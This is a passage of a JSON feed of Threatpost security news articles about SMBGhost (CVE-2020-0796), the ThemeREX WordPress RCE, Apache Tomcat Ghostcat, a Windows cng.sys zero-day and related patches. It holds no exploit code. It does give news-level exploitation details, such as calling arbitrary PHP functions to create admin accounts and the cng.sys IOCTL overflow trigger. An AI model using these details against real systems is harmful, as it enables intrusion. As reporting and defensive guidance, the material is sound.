Kronos Malware Charges", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0796"], "modified": "2019-07-29T13:23:34", "id": "THREATPOST:12364EEB82CF1DBF8D357DF9FBB64126", "href": "https://threatpost.com/wannacry-hero-avoids-jail-time-in-kronos-malware-charges/146721/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-11T18:04:34", "description": "A critical vulnerability in a WordPress plugin known as \u201cThemeREX Addons\u201d could open the door for remote code execution in tens of thousands of websites. According to Wordfence, the bug has been actively exploited in the wild as a zero-day.\n\nThe plugin, which is installed on approximately 44,000 sites, is used to apply various \u201cskins\u201d that govern the look and feel of web destinations, including theme-enhancing features and widgets.\n\nTo provide compatibility with WordPress\u2019 Gutenberg plugin, the ThemeREX Addons plugin uses an API, according to Wordfence researcher Chloe Chamberland, writing in [a blog posting](<https://www.wordfence.com/blog/2020/03/zero-day-vulnerability-in-themerex-addons-now-patched/>) on Monday. When the API interacts with Gutenberg, the touchpoints of that communication are known as endpoints. ThemeREX uses the \u201c~/includes/plugin.rest-api.php\u201d file to register an endpoint (\u201c/trx_addons/v2/get/sc_layout\u201d), which in turn calls the \u201ctrx_addons_rest_get_sc_layout\u201d function.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThis introduces an access-control problem, the researcher noted. In unpatched versions of ThemeREX, \u201cthere were no capability checks on this endpoint that would block users that were not administrators or currently signed in, so any user had the ability to call the endpoint regardless of capability,\u201d she explained. \u201cIn addition, there was no nonce check to verify the authenticity of the source.\u201d\n\nFurther down in the code, there\u2019s also a functionality used to get parameters from widgets that work with the Gutenberg plugin.\n\n\u201cThis is where the core of the remote code execution vulnerability was present,\u201d Chamberland wrote. \u201cThere were no restrictions on the PHP functions that could be used or the parameters that were provided as input. Instead, we see a simple if (function_exists($sc)) allowing for any PHP function to be called and executed.\u201d\n\nThe upshot of this is that adversaries can use various WordPress functions \u2013 for instance, in attacks in the wild, the \u201cwp_insert_user\u201d function was used to create administrative user accounts and take over sites, according to the research.\n\nThemeREX has now addressed the issue by completely removing the affected ~/plugin.rest-api.php file from the plugin \u2013 users should update to the latest version to stay protected.\n\nWordPress plugins continue to be a rich avenue of attack for cybercriminals. Last month, popular WordPress plugin Duplicator, which has more than 1 million active installations, [was discovered to have](<https://www.wordfence.com/blog/2020/03/zero-day-vulnerability-in-themerex-addons-now-patched/>) an unauthenticated arbitrary file download vulnerability that was being attacked.\n\nAnd, earlier in February a critical flaw in a popular WordPress plugin that helps make websites compliant with the General Data Protection Regulation (GDPR) [was disclosed](<https://threatpost.com/critical-wordpress-plugin-bug-afflicts-700k-sites/152871/>); it could enable attackers to modify content or inject malicious JavaScript code into victim websites. It affected 700,000 sites.\n\n**_Interested in security for the Internet of Things and how 5G will change things? Join our free Threatpost webinar, [\u201c5G, the Olympics and Next-Gen Security Challenges,\u201d](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>) as our panel discusses what use cases to expect in 2020 (the Olympics will be a first test), why 5G security risks are different, the role of AI in defense and how enterprises can manage their risk. [Register here](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>)._**\n", "cvss3": {}, "published": "2020-03-10T20:30:36", "type": "threatpost", "title": "Popular ThemeREX WordPress Plugin Opens Websites to RCE", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-10T20:30:36", "id": "THREATPOST:F7C6EEE7081716FAE624B70FD91C4225", "href": "https://threatpost.com/themerex-wordpress-plugin-remote-code-execution/153592/?utm_source=rss&utm_medium=rss&utm_campaign=themerex-wordpress-plugin-remote-code-execution", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-03-23T21:04:36", "description": "A vulnerability in the popular Apache Tomcat web server is ripe for active attack, thanks to a proof-of-concept (PoC) exploit making an appearance on GitHub. The now-patched bug affects Tomcat versions 7.0, 8.5 and 9.0.\n\nAccording to Flashpoint analysts Cheng Lu and Steven Ouellette, an exploit for the \u201cGhostcat,\u201d security bug (tracked as [CVE-2020-1938](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1938>) and first publicly disclosed Feb. 20) reliably allows information disclosure via file retrieval on a vulnerable server \u2013 without authentication or a user being tricked into a compromising interaction. And, in some situations, it could allow remote code execution, they said.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\n\u201cDue to the nature of the vulnerability, [the exploit] can be leveraged without any user interactions and with high reliability, with low chance of causing the vulnerable server to crash,\u201d explained the researchers, [in a posting](<https://www.flashpoint-intel.com/blog/ghostcat/>) on Friday. The duo said they\u2019ve confirmed that the PoC works.\n\n**The Bug**\n\nThe Apache Tomcat open-source web server supports various JavaScript-based technologies, including the Apache JServ Protocol (AJP) interface, which is where the vulnerability resides.\n\nThe AJP binary protocol \u2013 in essence a connector \u2013 allows the Tomcat servlet container, which is called Catalina, to communicate out to web applications to support extended functionalities for websites.\n\n\u201cThe AJP connector handles inbound requests [from applications] and passes to Catalina,\u201d wrote Lu and Ouellette. \u201cCatalina then passes the request to the proper web application and receives the dynamically generated content. This content is then sent back over the network by the AJP connector as the response to the request.\u201d\n\nThis connector is \u201chighly trusted\u2026and should not be exposed over an untrusted network, as it may be leveraged to gain complete access to the application server,\u201d the researchers warned, adding that it \u201cis expected to be exposed only internally.\u201d\n\nHowever, in a default Tomcat installation on Windows 10, Tomcat\u2019s AJP port, on 8009, is exposed \u2013 allowing outside users to interact with and gain access to the Tomcat server itself. The PoC exploit demonstrates how this state of affairs can be used to expose files.\n\nThe PoC code, written in Python, is capable of creating and sending an AJP request to a specified IP address, with a valid file path and name that the attacker would like to receive. A vulnerable server will return the file as a stream back to the PoC code, displaying it on the attacker\u2019s screen. Where the requested file is not a plain text file, the output stream can be saved and opened with an appropriate application.\n\n\u201cThrough the AJP connector, an attacker can retrieve arbitrary files from Tomcat\u2019s web root, including the files residing within the \u2018WEB-INF\u2019 and \u2018META-INF\u2019 directories through the ServletContext.getResourceAsStream() function,\u201d according to the Flashpoint posting. \u201cAdditionally, arbitrary files within the web application on the vulnerable Tomcat server can be processed as a JSP page through the AJP connector.\u201d\n\n**Remote Code Execution**\n\nThe bug does open the door to RCE, according to the researchers. If a vulnerable Tomcat server also allows file uploads (not the default setting, by the way), an attacker could upload their own code via the AJP connector.\n\nHowever, there\u2019s a big catch. To accomplish RCE, an attacker would need to find a web application that accepts file uploads that is running on a vulnerable Tomcat server. Attackers can\u2019t themselves simply change the server settings to allow file uploads.\n\n\u201cThe file-upload requirement can only be implemented by the web application developer, rather than the attacker,\u201d according to the analysis. \u201cFor this reason, only a portion of the vulnerable Tomcat servers may suffer the code-execution impact from this vulnerability.\u201d\n\nFurther, the publicly available PoC code doesn\u2019t support execution of files on a vulnerable server even with the prerequisites in place. \u201cHowever, such capability can be implemented on the basis of the PoC code with relative ease,\u201d the researchers warned.\n\n**Mitigation**\n\nWeb admins should update their Apache Tomcat instances to version 8.5.51 to avoid becoming victims; or, if they don\u2019t make use of AJP connectors, they can simply disable them. Lu and Ouelette noted. \u201cUsers can also consider exposing the connector only in the trusted network segment, rather than exposing it to the entire network, to reduce attack surface,\u201d they added.\n\nOtherwise, the barrier to exploitation is very low\u2014so businesses should brace for attacks.\n\n\u201cPublicly available PoC and exploit code make the exploitation of this vulnerability more accessible to threat actors of all skill levels. The mass scan activities could identify internet-facing instances of Tomcat susceptible to attacks. Therefore, Flashpoint analysts assess with moderate confidence that this vulnerability may see active exploitation attempts in the coming days in a more targeted fashion.\u201d\n", "cvss3": {}, "published": "2020-03-23T20:56:37", "type": "threatpost", "title": "Apache Tomcat Exploit Poised to Pounce, Stealing Files", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0796", "CVE-2020-1938"], "modified": "2020-03-23T20:56:37", "id": "THREATPOST:1586A7AFAD80F6833B8727AD8E03DB79", "href": "https://threatpost.com/apache-tomcat-exploit-stealing-files/154055/?utm_source=rss&utm_medium=rss&utm_campaign=apache-tomcat-exploit-stealing-files", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:27:36", "description": "UPDATE\n\nMicrosoft released an emergency out-of-band patch to fix a SMBv3 wormable bug on Thursday that leaked earlier this week. The a patch for the vulnerability, tracked as CVE-2020-0796, is now rolling out to Windows 10 and Windows Server 2019 systems worldwide, according to Microsoft.\n\nOn Wednesday Microsoft warned of a wormable, unpatched remote code-execution vulnerability in the Microsoft Server Message Block protocol \u2013 the same protocol that was targeted by the infamous WannaCry ransomware in 2017. Microsoft released its fix, [KB4551762](<https://support.microsoft.com/en-us/help/4551762/windows-10-update-kb4551762>), the following day as an update for Windows 10 (versions 1903 and 1909) and Windows Server 2019 (versions 1903 and 1909).\n\nThe critical bug affects Windows 10 and Windows Server 2019, and was not included in Microsoft\u2019s [Patch Tuesday release](<https://threatpost.com/microsoft-patches-bugs-march-update/153597/>) this week.\n\nThe bug can be found in version 3.1.1 of Microsoft\u2019s SMB file-sharing system. SMB allows multiple clients to access shared folders and can provide a rich playground for malware when it comes to lateral movement and client-to-client infection. This was played out in version 1 of SMB back in 2017, when the [WannaCry ransomware](<https://threatpost.com/one-year-after-wannacry-a-fundamentally-changed-threat-landscape/132047/>) used the NSA-developed [EternalBlue SMB exploit](<https://threatpost.com/scanner-shows-eternalblue-vulnerability-unpatched-on-thousands-of-machines/126818/>) to self-propagate rapidly around the world.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nIn this case, \u201cto exploit the vulnerability against an SMB server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 server,\u201d Microsoft explained [in its advisory](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200005#ID0EN>), issued Wednesday. \u201cTo exploit the vulnerability against an SMB client, an unauthenticated attacker would need to configure a malicious SMBv3 server and convince a user to connect to it.\u201d\n\nMicrosoft issued its advisory only after details of the bug were published online by Cisco Talos and Fortinet. The firms\u2019 disclosure was an apparent miscommunication with Microsoft \u2013 both posts have since been taken down.\n\nAccording to [Duo Security](<https://duo.com/decipher/microsoft-advisory-warns-of-smbv3-flaw>), Fortinet had described the issue as a \u201cBuffer Overflow Vulnerability in Microsoft SMB Servers\u201d and said it could be used to execute arbitrary code within the context of the application. Cisco Talos meanwhile warned that a \u201cwormable\u201d attack would be able to exploit the vulnerability to \u201cmove from victim to victim.\u201d\n\nThreatpost reached out to both firms for additional details. Cisco Talos told Threatpost, \u201cOn March 10, information on an in-process effort was inadvertently posted and then promptly deleted from the Talos blog because it was not finalized. As a matter of policy, we do not discuss research that has not yet been approved for public disclosure. We are aware that this may have caused some confusion and will follow up when we have more to offer.\u201d\n\nWhile the bug is dangerous, researchers said this bug likely won\u2019t lead to \u201cWannaCry 2.0.\u201d\n\n\u201cConsidering that SMBv3 is not as widely used as SMBv1, the potential immediate impact of this threat is most likely lower than past vulnerabilities,\u201d Richard Melick, senior technical product manager at Automox, told Threatpost. \u201cBut that does not mean organizations should be disregarding any endpoint hardening that can happen now while Microsoft works on a patch\u2026it\u2019s better to respond today and disable SMBv3 and block TCP port 445. Respond now and vulnerabilities end today.\u201d\n\nJake Williams, founder of security firm Rendition Security, [said on Twitter](<https://twitter.com/MalwareJake/status/1237512617817751552>) that the risk of exploitation is mitigated by kernel protections \u2013 specifically kernel address space layout randomization (KASLR). KASLR randomly arranges the address space positions of key data areas of a given process. It essentially means that an attacker can\u2019t establish one attack path and use it over and over again.\n\n\u201cCore SMB sits in kernel space and KASLR is great at mitigating exploitation,\u201d tweeted Williams. \u201cAssuming this is kernel space, any unsuccessful exploitation results in [the blue screen of death] BSOD.\u201d He added, \u201cEven with trigger code, you still have to remotely bypass KASLR (not an easy task). If you need proof, [look at BUCKEYE](<https://symantec-blogs.broadcom.com/blogs/threat-intelligence/buckeye-windows-zero-day-exploit>). They had the EternalBlue trigger, but had to chain it with another information disclosure vulnerability to gain code execution. This isn\u2019t easy.\u201d\n\nSo far, there\u2019s no evidence that the vulnerability had been exploited in the wild, Microsoft said in the advisory. However, Melick said to proceed with caution.\n\n\u201cThere are still too many unknowns to say how effective this wormable vulnerability could be; is it going to be as easy as EternalBlue to implement or will it have the same difficulties as BlueKeep?\u201d Melick noted \u2013 the latter in reference to the [wormable bug](<https://threatpost.com/bluekeep-mega-worm-looms-as-fresh-poc-shows-full-system-takeover/145368/>) disclosed last year that some feared would lead to another WannaCry-level event. Exploits for BlueKeep however have so far [fallen well short](<https://threatpost.com/bluekeep-attacks-have-arrived-are-initially-underwhelming/149829/>) of researchers\u2019 initial fears.\n\nIn lieu of a patch, Microsoft on Wednesday noted that administrators can use PowerShell to disable SMBv3 compression, which will block unauthenticated attackers from exploiting the vulnerability against an SMBv3 server.\n\nTo protect clients from outside attacks, it\u2019s necessary to block TCP port 445 at the enterprise perimeter firewall.\n\n\u201cTCP port 445 is used to initiate a connection with the affected component,\u201d Microsoft noted. \u201cBlocking this port at the network perimeter firewall will help protect systems that are behind that firewall from attempts to exploit this vulnerability. This can help protect networks from attacks that originate outside the enterprise perimeter. Blocking the affected ports at the enterprise perimeter is the best defense to help avoid internet-based attacks.\u201d\n\nHowever, systems could still be vulnerable to attacks from within the enterprise perimeter \u2013 so once attackers penetrate the corporate network, they could use an exploit to move around in an unfettered way. Microsoft has published [general guidelines](<https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections>) to prevent lateral connections.\n\n**_Interested in security for the Internet of Things and how 5G will change things? Join our free Threatpost webinar, [\u201c5G, the Olympics and Next-Gen Security Challenges,\u201d](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>) as our panel discusses what use cases to expect in 2020 (the Olympics will be a first test), why 5G security risks are different, the role of AI in defense and how enterprises can manage their risk. [Register here](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>)._**\n\n_(This article was updated March 12 with the news that Microsoft has released a patch for CVE-2020-0796)_\n", "cvss3": {}, "published": "2020-03-11T17:13:53", "type": "threatpost", "title": "Wormable, Unpatched Microsoft Bug Threatens Corporate LANs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0796", "CVE-2020-5135"], "modified": "2020-03-11T17:13:53", "id": "THREATPOST:0EAD358006302B8EB3637C22334E13DC", "href": "https://threatpost.com/wormable-unpatched-microsoft-bug/153632/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-02T15:57:19", "description": "A high-severity Windows driver bug is being exploited in the wild as a zero-day. It allows local privilege escalation and sandbox escape.\n\nThe security vulnerability [was disclosed](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2104>) by Google Project Zero just seven days after it was reported, since cybercriminals are already exploiting it, according to researchers.\n\nThe flaw (CVE-2020-17087) has to do with the way the Windows Kernel Cryptography Driver (cng.sys) processes input/output control (IOCTL), which is a system call for device-specific input/output operations and other operations that cannot be expressed by regular system calls.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\n\u201c[Cng.sys] exposes a \\Device\\CNG device to user-mode programs and supports a variety of IOCTLs with non-trivial input structures,\u201d according to the bug report, published on Friday. \u201cWe have identified a vulnerability in the processing of IOCTL 0x390400, reachable through [a] series of calls.\u201d\n\nWith specially crafted requests, an attacker can trigger a pool-based buffer overflow, which leads to a system crash and opens the door for exploitation.\n\n\u201cThe bug resides in the cng!CfgAdtpFormatPropertyBlock function and is caused by a 16-bit integer truncation issue,\u201d the Project Zero team explained. \u201cThe integer overflow occurs in line 2, and if SourceLength is equal to or greater than 0x2AAB, an inadequately small buffer is allocated from the NonPagedPool in line 3. It is subsequently overflown by the binary-to-hex conversion loop in lines 5-10 by a multiple of 65536 bytes.\u201d\n\nThe team put together a proof-of-concept exploit that shows the ease of triggering an attack. It worked on an up-to-date build of Windows 10 1903 (64-bit), but researchers said that the bug appears to affect Windows versions going back to Windows 7.\n\n\u201cA crash is easiest to reproduce with Special Pools enabled for cng.sys, but even in the default configuration the corruption of 64kB of kernel data will almost surely crash the system shortly after running the exploit,\u201d according to Project Zero.\n\nThe director of Google\u2019s Threat Analysis Group, Shane Huntley, said in the disclosure that the attacks are targeted and unrelated to any U.S. election-related targeting. Another Project Zero team member noted that Microsoft is expected to fix the bug on its next Patch Tuesday update, on Nov. 10.\n\nSome quibbled with the short disclosure timeline, but Project Zero researchers Ben Hawkes and Tavis Ormandy defended the move on Twitter:\n\n> The quick take: we think there's defensive utility to sharing these details, and that opportunistic attacks using these details between now and the patch being released is reasonable unlikely (so far it's been used as part of an exploit chain, and the entry-point attack is fixed)\n> \n> \u2014 Ben Hawkes (@benhawkes) [October 30, 2020](<https://twitter.com/benhawkes/status/1322211779028557824?ref_src=twsrc%5Etfw>)\n\nOrmandy [noted](<https://twitter.com/taviso/status/1322219253878026241>), \u201cYour attack is more likely to be detected if you attempt to use documented vulnerabilities, because people know what to look for. The other details of your attack will then be analyzed.\u201d\n\nMateusz Jurczyk and Sergei Glazunov of Google Project Zero were credited with finding the bug.\n\n**Hackers Put Bullseye on Healthcare: [On Nov. 18 at 2 p.m. EDT](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) find out why hospitals are getting hammered by ransomware attacks in 2020. [Save your spot for this FREE webinar](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) on healthcare cybersecurity priorities and hear from leading security voices on how data security, ransomware and patching need to be a priority for every sector, and why. Join us Wed., Nov. 18, 2-3 p.m. EDT for this [LIVE](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>), limited-engagement webinar.**\n", "cvss3": {}, "published": "2020-11-02T14:57:02", "type": "threatpost", "title": "Unpatched Windows Zero-Day Exploited in the Wild for Sandbox Escape", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0796", "CVE-2020-17087"], "modified": "2020-11-02T14:57:02", "id": "THREATPOST:2AAD8D184B893593E4E3B11FE31F97B3", "href": "https://threatpost.com/unpatched-windows-zero-day-exploited-sandbox-escape/160828/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:24:14", "description": "The release of a fully functional proof-of-concept (PoC) exploit for a critical, wormable remote code-execution (RCE) vulnerability in Windows could spark a wave of cyberattacks, the feds have warned.\n\nMicrosoft patched the bug tracked as [CVE-2020-0796](<https://threatpost.com/wormable-unpatched-microsoft-bug/153632/>) back in March; also known as SMBGhost or CoronaBlue, it affects Windows 10 and Windows Server 2019. It exists in version 3.1.1 of the Microsoft Server Message Block (SMB) protocol \u2013 the same protocol that was targeted by the infamous [WannaCry ransomware](<https://threatpost.com/wannacry-infested-laptop-art-auction/144992/>) in 2017. SMB is a file-sharing system that allows multiple clients to access shared folders, and can provide a rich playground for malware when it comes to lateral movement and client-to-client infection.\n\nIn this case, the bug is an integer overflow vulnerability in the SMBv3.1.1 message decompression routine of the kernel driver srv2.sys.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nMicrosoft released its fix, KB4551762, as an update for Windows 10 (versions 1903 and 1909) and Windows Server 2019 (versions 1903 and 1909).\n\n\u201cAlthough Microsoft disclosed and provided updates for this vulnerability in March 2020, malicious cyber-actors are targeting unpatched systems with the new PoC, according to recent open-source reports,\u201d [warned](<https://www.us-cert.gov/ncas/current-activity/2020/06/05/unpatched-microsoft-systems-vulnerable-cve-2020-0796>) the Cybersecurity and Infrastructure Security Agency (CISA) on Friday. \u201cCISA strongly recommends using a firewall to block SMB ports from the internet and to apply patches to critical- and high-severity vulnerabilities as soon as possible.\u201d\n\nThe author behind the PoC, who goes by \u201cChompie,\u201d announced [his exploit](<https://github.com/chompie1337/SMBGhost_RCE_PoC/blob/master/README.md>) last week on Twitter. Several replies followed the original post, confirming that the exploit does in fact work.\n\n> This was a pain \ud83d\ude02. But I was able to achieve RCE with CVE 2020-0796 [#SMBGhost](<https://twitter.com/hashtag/SMBGhost?src=hash&ref_src=twsrc%5Etfw>). [pic.twitter.com/mvQ0YQt9GT](<https://t.co/mvQ0YQt9GT>)\n> \n> \u2014 chompie (@chompie1337) [June 1, 2020](<https://twitter.com/chompie1337/status/1267327689213517825?ref_src=twsrc%5Etfw>)\n\nThe PoC is notable because it achieves RCE \u2013 previous attempts to exploit SMBGhost have resulted only in denial of service or local privilege escalation, according to security analysts.\n\n\u201cWhile there have already been many public reports and PoCs of LPE (Local Privilege Escalation), none of them have shown that RCE is actually possible so far,\u201d said researchers at Ricerca Security, who did [a full writeup](<https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html>) of Chompie\u2019s exploit. \u201cThis is probably because remote kernel exploitation is very different from local exploitation in that an attacker can\u2019t utilize useful OS functions such as creating userland processes, referring to PEB, and issuing system calls.\u201d\n\nWindows 10 also has specific mitigations that make RCE a much more difficult thing to achieve, they noted.\n\n\u201cIn the latest version of Windows 10, RCE became extremely challenging owing to almost flawless address randomization,\u201d the researchers explained. \u201cIn a nutshell, we defeat this mitigation by abusing MDL (memory descriptor list)s, structs frequently used in kernel drivers for Direct Memory Access. By forging this struct, we make it possible to read from \u2018physical\u2019 memory. As basically no exception will occur when reading physical memory locations, we obtain a stable read primitive.\u201d\n\nTo protect networks, administrators should apply the updates; Microsoft also has offered [workaround guidance](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>) for those that can\u2019t patch. For instance, on the server side, companies can disable SMBv3 compression to block unauthenticated attackers, using a PowerShell command: Set-ItemProperty -Path \u201cHKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\u201d DisableCompression -Type DWORD -Value 1 -Force. No reboot is necessary.\n\nTo protect unpatched SMB clients, Microsoft [noted that it\u2019s possible](<https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections>) to block traffic via firewalls and other methods. Companies can for instance simply block TCP port 445 at the enterprise perimeter firewall (though systems could still be vulnerable to attacks from within their enterprise perimeter).\n", "cvss3": {}, "published": "2020-06-08T15:54:41", "type": "threatpost", "title": "SMBGhost RCE Exploit Threatens Corporate Networks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0796", "CVE-2020-5135"], "modified": "2020-06-08T15:54:41", "id": "THREATPOST:A7995232CE91305C94B84BB400B1EA34", "href": "https://threatpost.com/smbghost-rce-exploit-corporate-networks/156391/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-17T07:28:30", "description": "Criminal small talk in underground forums offer critical clues about which known Common Vulnerabilities and Exposures (CVEs) threat actors are most focused on. This, in turn, offers defenders clues on what to watch out for.\n\nAn analysis of such chatter, by Cognyte, examined 15 [cybercrime forums](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) between Jan. 2020 and March 2021. In its report, researchers highlight what CVEs are the most frequently mentioned and try to determine where attackers might strike next.\n\n\u201cOur findings revealed that there is no 100 percent correlation between the two parameters, since the top five CVEs that received the highest number of posts are not exactly the ones that were mentioned on the highest number of Dark Web forums examined,\u201d the report said. \u201cHowever, it is still enough to understand which CVEs were popular among threat actors on the Dark Web during the time examined.\u201d[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)The researchers found [ZeroLogon](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>), [SMBGhost](<https://threatpost.com/smbghost-rce-exploit-corporate-networks/156391/>) and [BlueKeep](<https://threatpost.com/bluekeep-attacks-have-arrived-are-initially-underwhelming/149829/>) were among the most buzzed about vulnerabilities among attackers between Jan. 2020 and March 2021.\n\n## **Six CVEs Popular with Criminals**\n\n[CVE-2020-1472](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-1472>) (aka ZeroLogon)\n\n[CVE-2020-0796](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-0796>) (aka SMBGhost)\n\n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n\n[CVE-2019-0708](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2019-0708>) (aka BlueKeep)\n\n[CVE-2017-11882](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-11882>)\n\n[CVE-2017-0199](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-0199>)\n\n\u201cMost of the CVEs in this list were abused by nation-state groups and cybercriminals, such as ransomware gangs, during worldwide campaigns against different sectors,\u201d the report said.\n\nNotably, all the CVEs threat actors are still focused on are old, meaning that basic patching and mitigation could have stopped many attacks before they even got started.\n\nThe report added, the 9-year-old [CVE-2012-0158](<https://nvd.nist.gov/vuln/detail/CVE-2012-0158>) was exploited by threat actors during the COVID-19 pandemic in 2020, which, \u201cindicates that organizations are not patching their systems and are not maintaining a resilient security posture.\u201d\n\nMicrosoft has the dubious distinction of being behind five of the six most popular vulns on the Dark Web, Cognyte found. Microsoft has also had a tough time getting users to patch them.\n\nZeroLogon is a prime example. The [flaw in Microsoft\u2019s software](<https://threatpost.com/microsoft-implements-windows-zerologon-flaw-enforcement-mode/163104/>) allows threat actors to access domain controllers and breach all Active Directory identity services. Patching ZeroLogon was so slow, Microsoft announced in January it would start blocking Active Directory domain access to unpatched systems with an \u201cenforcement mode.\u201d\n\nIn March 2020, Microsoft patched the number two vulnerability on the list, CVE-2020-0796, but as of October, 100,000 [Windows systems were still vulnerable](<https://threatpost.com/microsofts-smbghost-flaw-108k-windows-systems/160682/>).\n\nThe analysts explained varying CVEs were more talked about depending on the forum language. The CVE favored by Russian-language forums was CVE-2019-19781. Chinese forums were buzzing most about CVE-2020-0796. There was a tie between CVE-2020-0688 and CVE-2019-19781 in English-speaking threat actor circles. And Turkish forums were focused on CVE-2019-6340.\n\nThe researchers add, for context, that about half of the monitored forums were Russian-speaking and that Spanish forums aren\u2019t mentioned because there wasn\u2019t a clear frontrunning CVE discussed.\n\n**_Check out our free _**[**_upcoming live and on-demand webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {}, "published": "2021-07-16T21:07:15", "type": "threatpost", "title": "Top CVEs Trending with Cybercriminals", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2017-0199", "CVE-2017-11882", "CVE-2019-0708", "CVE-2019-19781", "CVE-2019-6340", "CVE-2020-0688", "CVE-2020-0796", "CVE-2020-1472"], "modified": "2021-07-16T21:07:15", "id": "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "href": "https://threatpost.com/top-cves-trending-with-cybercriminals/167889/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:24:13", "description": "Microsoft has released patches for 129 vulnerabilities as part of its June Patch Tuesday updates \u2013 the highest number of CVEs ever released by Microsoft in a single month.\n\nWithin the blockbuster security update, 11 critical remote code-execution flaws were patched in Windows, SharePoint server, Windows Shell, VBScript and other products. Unlike other [recent monthly updates](<https://threatpost.com/april-patch-tuesday-microsoft-active-exploit/154794/>) from Microsoft, its [June updates](<https://portal.msrc.microsoft.com/en-us/security-guidance>) did not include any zero-day vulnerabilities being actively attacked in the wild.\n\n\u201cFor June, Microsoft released patches for 129 CVEs covering Microsoft Windows, Internet Explorer (IE), Microsoft Edge (EdgeHTML-based and Chromium-based in IE Mode), ChakraCore, Office and Microsoft Office Services and Web Apps, Windows Defender, Microsoft Dynamics, Visual Studio, Azure DevOps, and Microsoft Apps for Android,\u201d according to Dustin Childs, with Trend Micro\u2019s Zero Day Initiative, [in a Tuesday post](<https://www.thezdi.com/blog/2020/6/9/the-june-2020-security-update-review>). \u201cThis brings the total number of Microsoft patches released this year to 616 \u2013 just 49 shy of the total number of CVEs they addressed in all of 2017.\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nMicrosoft\u2019s June Patch Tuesday volume beats out the update from May, where it [released fixes for 111](<https://threatpost.com/microsoft-111-bugs-may-patch-tuesday/155669/>) security flaws, including 16 critical bugs and 96 that are rated important.\n\n## **SMBv3 Flaws**\n\nSatnam Narang, staff research engineer at Tenable, told Threatpost that a trio of fixes stuck out in the Patch Tuesday updates, for flaws in Microsoft Server Message Block (SMB). Two of these flaws exist in Microsoft Server Message Block 3.1.1 (SMBv3). All three vulnerabilities are notable because they\u2019re rated as \u201cexploitation more likely\u201d based on Microsoft\u2019s Exploitability Index.\n\nThe two flaws in SMBv3 include a denial-of-service vulnerability (CVE-2020-1284) and an information-disclosure vulnerability (CVE-2020-1206), both of which can be exploited by a remote, authenticated attacker.\n\nNarang said the flaws \u201cfollow in the footsteps\u201d of [CVE-2020-0796](<https://threatpost.com/wormable-unpatched-microsoft-bug/153632/>), a \u201cwormable\u201d remote code execution flaw in SMBv3 that was patched back 